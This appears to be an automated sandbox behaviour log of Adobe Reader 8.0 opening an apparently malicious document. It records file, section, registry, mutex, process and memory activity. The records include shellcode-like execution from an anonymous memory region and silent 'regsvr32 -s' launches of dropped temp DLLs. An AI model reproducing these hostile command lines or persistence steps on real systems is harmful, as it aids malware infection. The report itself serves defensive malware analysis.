Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 40134, 30146, 90112, 60108, 1, 1, 1, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2831672320
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 40134, 30146, 90112, 60108, 1, 1, 1, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2831675804
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 40134, 30146, 90112, 60108, 1, 1, 1, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2831678051
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 6C8 HWNDs: 40134, 30146, 90112, 60108, 1, 1, 1, 60108, 1, 2eba, 0, 57005c, 4e0049, 4f0044, 1 success or wait 2831679215
+ Sections
+ General
Start time: 05:44:06
Start date: 08/12/2011
Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe
Commandline: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe /o /eo /l /b /w 393476
Imagebase: 0x400000
File size: 341616 bytes
MD5 hash: 80660C611B596FFE8AF4074B31AA6FB7
File Activities:
+ File opened
File Path | Access | Options | Content overwritten | Completion | Count | Source Address
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat | read attributes and synchronize and generic read and generic write | synchronous io non alert and non directory file and random access | false | success or wait | 2 | 2FC013C
C:\Documents and Settings\Administrator\Cookies\index.dat | read attributes and synchronize and generic read and generic write | synchronous io non alert and non directory file and random access | false | success or wait | 2 | 2FC013C
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat | read attributes and synchronize and generic read and generic write | synchronous io non alert and non directory file and random access | false | success or wait | 2 | 2FC013C
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\J5ROTG8O\w[1].htm | read attributes and synchronize and generic read | synchronous io non alert and non directory file | false | success or wait | 2 | 2FC013C
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\ZLL6TAVD\w[1].htm | read attributes and synchronize and generic read | synchronous io non alert and non directory file | false | success or wait | 2 | 2FC013C
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat | read attributes and synchronize and generic read | synchronous io non alert and non directory file | false | object name not found | 1 | 5FDA4FF
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 280000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 2A0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2F0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 340000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 340000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 340000 24576 own pid readonly object name not found 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcp80.dll query and write and read and execute image 7C420000 552960 own pid read write success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcr80.dll query and write and read and execute image 78130000 634880 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 78130000 634880 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 460000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll write and read and execute commit 360000 475136 own pid execute success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll write and read and execute commit 360000 475136 own pid execute success or wait 1
C:\WINDOWS\AppPatch\aclayers.dll query and write and read and execute image 71590000 495616 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\WINSPOOL.DRV write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 370000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3C0000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 3C0000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 940000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 940000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3F0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 3F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 3F0000 4096 own pid readonly success or wait 1
\KnownDlls\AcroRd32.dll write and read and execute unknown 3F0000 4096 own pid readonly object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.dll query and write and read and execute image 960000 14249984 own pid read write conflicting addresses 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\AGM.dll write and read and execute unknown 77C00000 32768 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\AGM.dll query and write and read and execute image 6000000 4939776 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\CoolType.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\CoolType.dll query and write and read and execute image 8000000 2334720 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 8000000 2334720 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\BIB.dll write and read and execute unknown 76B40000 184320 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\BIB.dll query and write and read and execute image 7000000 106496 own pid read write success or wait 1
\KnownDlls\ACE.dll write and read and execute unknown 7000000 106496 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\ACE.dll query and write and read and execute image 5000000 696320 own pid read write success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 17D0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 17D0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 17E0000 262144 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit 1920000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit 1920000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit 1920000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit 1920000 180224 own pid readonly success or wait 1
\KnownDlls\apphelp.dll write and read and execute unknown 77B40000 139264 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 1920000 1208320 own pid readonly success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown 1920000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit 1930000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 1930000 1208320 own pid readonly success or wait 1
\KnownDlls\SETUPAPI.dll write and read and execute unknown 1930000 1208320 own pid readonly object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\WINDOWS\system32\winlogon.exe write and read and execute commit 1B30000 507904 own pid execute success or wait 1
\KnownDlls\xpsp2res.dll write and read and execute unknown 1B30000 507904 own pid execute object name not found 1
C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image 1B30000 2904064 own pid read write conflicting addresses 1
\KnownDlls\Accessibility.api write and read and execute unknown 1B30000 2904064 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api query and write and read and execute image 29800000 372736 own pid read write success or wait 1
\KnownDlls\AcroForm.api write and read and execute unknown 29800000 372736 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api query and write and read and execute image 20800000 9744384 own pid read write success or wait 1
\KnownDlls\USP10.dll write and read and execute unknown 20800000 9744384 own pid read write object name not found 1
C:\WINDOWS\system32\usp10.dll query and write and read and execute image 74D90000 438272 own pid read write success or wait 1
\KnownDlls\Annots.api write and read and execute unknown 74D90000 438272 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api query and write and read and execute image 22100000 4165632 own pid read write success or wait 1
\KnownDlls\Checkers.api write and read and execute unknown 22100000 4165632 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api query and write and read and execute image 45800000 851968 own pid read write success or wait 1
\KnownDlls\DigSig.api write and read and execute unknown 45800000 851968 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api query and write and read and execute image 23000000 1167360 own pid read write success or wait 1
\KnownDlls\DVA.api write and read and execute unknown 23000000 1167360 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api query and write and read and execute image 40800000 139264 own pid read write success or wait 1
\KnownDlls\eBook.api write and read and execute unknown 40800000 139264 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api query and write and read and execute image 26800000 65536 own pid read write success or wait 1
\KnownDlls\EScript.api write and read and execute unknown 26800000 65536 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api query and write and read and execute image 23800000 1437696 own pid read write success or wait 1
\KnownDlls\EWH32.api write and read and execute unknown 23800000 1437696 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api query and write and read and execute image 24000000 147456 own pid read write success or wait 1
\KnownDlls\HLS.api write and read and execute unknown 24000000 147456 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api query and write and read and execute image 31800000 69632 own pid read write success or wait 1
\KnownDlls\IA32.api write and read and execute unknown 31800000 69632 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api query and write and read and execute image 25800000 98304 own pid read write success or wait 1
\KnownDlls\ImageViewer.API write and read and execute unknown 25800000 98304 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API query and write and read and execute image 46800000 475136 own pid read write success or wait 1
\KnownDlls\MakeAccessible.api write and read and execute unknown 46800000 475136 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api query and write and read and execute image 29000000 2273280 own pid read write success or wait 1
\KnownDlls\Multimedia.api write and read and execute unknown 29000000 2273280 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api query and write and read and execute image 2D800000 1372160 own pid read write success or wait 1
\KnownDlls\PDDom.api write and read and execute unknown 2D800000 1372160 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api query and write and read and execute image 2B800000 417792 own pid read write success or wait 1
\KnownDlls\PPKLite.api write and read and execute unknown 2B800000 417792 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api query and write and read and execute image 28000000 5795840 own pid read write success or wait 1
\KnownDlls\ReadOutLoud.api write and read and execute unknown 28000000 5795840 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api query and write and read and execute image 29A00000 122880 own pid read write success or wait 1
\KnownDlls\reflow.api write and read and execute unknown 29A00000 122880 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api query and write and read and execute image 28800000 385024 own pid read write success or wait 1
\KnownDlls\SaveAsRTF.api write and read and execute unknown 28800000 385024 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api query and write and read and execute image 32000000 319488 own pid read write success or wait 1
\KnownDlls\Search.api write and read and execute unknown 32000000 319488 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api query and write and read and execute image 2A300000 372736 own pid read write success or wait 1
\KnownDlls\Search5.api write and read and execute unknown 2A300000 372736 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api query and write and read and execute image 2A000000 102400 own pid read write success or wait 1
\KnownDlls\SendMail.api write and read and execute unknown 2A000000 102400 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api query and write and read and execute image 2A800000 139264 own pid read write success or wait 1
\KnownDlls\Spelling.api write and read and execute unknown 2A800000 139264 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api query and write and read and execute image 2B000000 286720 own pid read write success or wait 1
\KnownDlls\Updater.api write and read and execute unknown 2B000000 286720 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api query and write and read and execute image 30800000 188416 own pid read write success or wait 1
\KnownDlls\weblink.api write and read and execute unknown 30800000 188416 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api query and write and read and execute image 2E000000 196608 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 2E000000 196608 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown 5AD70000 229376 own pid read write object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown 76FD0000 520192 own pid read write object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
C:\WINDOWS\system32\rasapi32.dll write and read and execute commit 2DD0000 237568 own pid execute success or wait 1
C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
\KnownDlls\rasman.dll write and read and execute unknown 76EE0000 245760 own pid read write object name not found 1
C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown 5B860000 348160 own pid read write success or wait 1
\KnownDlls\WS2_32.dll write and read and execute unknown 5B860000 348160 own pid read write object name not found 1
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
\KnownDlls\TAPI32.dll write and read and execute unknown 71AA0000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
\KnownDlls\rtutils.dll write and read and execute unknown 76EB0000 192512 own pid read write object name not found 1
C:\WINDOWS\system32\rtutils.dll query and write and read and execute image 76E80000 57344 own pid read write success or wait 1
C:\WINDOWS\system32\tapi32.dll read commit 2DD0000 184320 own pid readonly success or wait 1
\BaseNamedObjects\ASMWIN0 query and write and read commit 2DD0000 4096 own pid read write success or wait 1
\BaseNamedObjects\ASMWIN1 query and write and read commit 2DD0000 4096 own pid read write success or wait 1
\BaseNamedObjects\ASMWIN2 query and write and read commit 2DD0000 4096 own pid read write success or wait 1
\KnownDlls\AXE8SharedExpat.dll write and read and execute unknown 2DD0000 4096 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\AXE8SharedExpat.dll query and write and read and execute image 10000000 184320 own pid read write success or wait 1
\KnownDlls\AXSLE.dll write and read and execute unknown 10000000 184320 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\AXSLE.dll query and write and read and execute image 2E10000 618496 own pid read write conflicting addresses 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 2EC0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown 71A50000 258048 own pid read write object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit 2EC0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\WLDAP32.dll write and read and execute unknown 76F60000 180224 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown 76F60000 180224 own pid read write object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
\KnownDlls\ATMLIB.dll write and read and execute unknown 76FC0000 24576 own pid read write object name not found 1
C:\WINDOWS\system32\atmlib.dll query and write and read and execute image 73C20000 45056 own pid read write success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\AdobePiStd.otf query and read commit 2EE0000 90112 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Bold.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-BoldOblique.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Oblique.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-Bold.otf query and read commit 2EE0000 212992 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-BoldIt.otf query and read commit 2EE0000 253952 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-It.otf query and read commit 2EE0000 253952 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-Regular.otf query and read commit 2EE0000 208896 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-Bold.otf query and read commit 2EE0000 98304 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-BoldIt.otf query and read commit 2EE0000 102400 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-It.otf query and read commit 2EE0000 102400 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-Regular.otf query and read commit 2EE0000 98304 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\SY______.PFB query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\icucnv34.dll write and read and execute commit 2EF0000 299008 own pid execute success or wait 1
C:\Program Files\Adobe\Reader 8.0\Reader\icucnv34.dll query and write and read and execute image 4A800000 299008 own pid read write success or wait 1
\KnownDlls\icudt34.dll write and read and execute unknown 4A800000 299008 own pid read write object name not found 1
C:\Program Files\Adobe\Reader 8.0\Reader\icudt34.dll query and write and read and execute image 4AD00000 90112 own pid read write success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Oblique.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Bold.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-BoldOblique.otf query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\SY______.PFB query and read commit 2EE0000 36864 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\AdobePiStd.otf query and read commit 2F00000 90112 own pid readonly success or wait 1
C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-Regular.otf query and read commit 2F00000 98304 own pid readonly success or wait 1
unknown query and write and read and execute commit 2FC0000 4096 own pid execute and read and write success or wait 1
\KnownDlls\mlang.dll write and read and execute unknown 111B0000 622592 own pid readonly object name not found 1
C:\WINDOWS\system32\mlang.dll query and write and read and execute image 75CF0000 593920 own pid read write success or wait 1
C:\WINDOWS\system32\mlang.dll read commit 111B0000 589824 own pid readonly success or wait 1
\KnownDlls\WININET.dll write and read and execute unknown 771B0000 696320 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown 77B20000 73728 own pid read write success or wait 1
C:\WINDOWS\system32\wininet.dll read commit 111B0000 667648 own pid readonly success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_147456 write unknown 4F90000 147456 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Cookies_index.dat_32768 write unknown 4FC0000 32768 own pid read write success or wait 1
\BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768 write unknown 4FD0000 32768 own pid read write success or wait 1
\KnownDlls\wsock32.dll write and read and execute unknown 4FD0000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\wsock32.dll query and write and read and execute image 71AD0000 36864 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown 71AD0000 36864 own pid read write object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit 4FE0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
\KnownDlls\sensapi.dll write and read and execute unknown 71A90000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
\BaseNamedObjects\SENS Information Cache read unknown 4FE0000 4096 own pid readonly success or wait 1
\BaseNamedObjects\UrlZonesSM_Administrator query and write and read commit 4FE0000 4096 own pid readonly object name exists 1
C:\WINDOWS\system32\regsvr32.exe query and write and read and execute and extend size image 4FE0000 4096 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 115B0000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 5FB0000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 5FB0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 5FB0000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 5FB0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 5FB0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and write and read and execute and extend size image 5FB0000 12288 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 115B0000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 5FC0000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 5FC0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe write and read and execute commit 5FC0000 12288 own pid execute success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 5FC0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\regsvr32.exe query and read commit 5FC0000 12288 own pid readonly success or wait 1
unknown query and write and read commit 6FD0000 12288 own pid read write success or wait 1
unknown query and write and read commit 6FD0000 12288 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\urlmon.dll write and read and execute unknown 7E1E0000 663552 own pid read write success or wait 1 2FC00D4
C:\WINDOWS\system32\urlmon.dll read commit 111B0000 622592 own pid readonly success or wait 1 2FC00D4
Registry Activities:
+ Key value replaced with new
Key Path Name Type Old Data New Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 Dword -1521036924 -1521036916 success or wait 1 5FC5F0A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Enabled object name not found 1 5FC5EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter EnabledV8 success or wait 1 5FC5EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter CleanCookies success or wait 1 5FC5FBA
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter CleanCookies success or wait 1 5FC5EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter 1406 success or wait 5 5FC5EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter 1609 success or wait 5 5FC5EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter 15807505 success or wait 1 5FC5F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter 15807505 success or wait 1 5FC5F7A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} object name exists 1 5FE0DFC
Process Activities:
+ Process started
PID Filepath Cmdline Flags Completion Count Source Address
1008 C:\WINDOWS\system32\regsvr32.exe regsvr32 -s C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt0.dll 0 success or wait 1 2FC014F
1852 C:\WINDOWS\system32\regsvr32.exe regsvr32 -s C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt1.dll 0 success or wait 1 2FC014F
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2140 1732 7C8106F9 false C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe success or wait 1 5FD8106
2556 1732 7C8106F9 false C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe success or wait 1 5FD8106
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 5FDF078
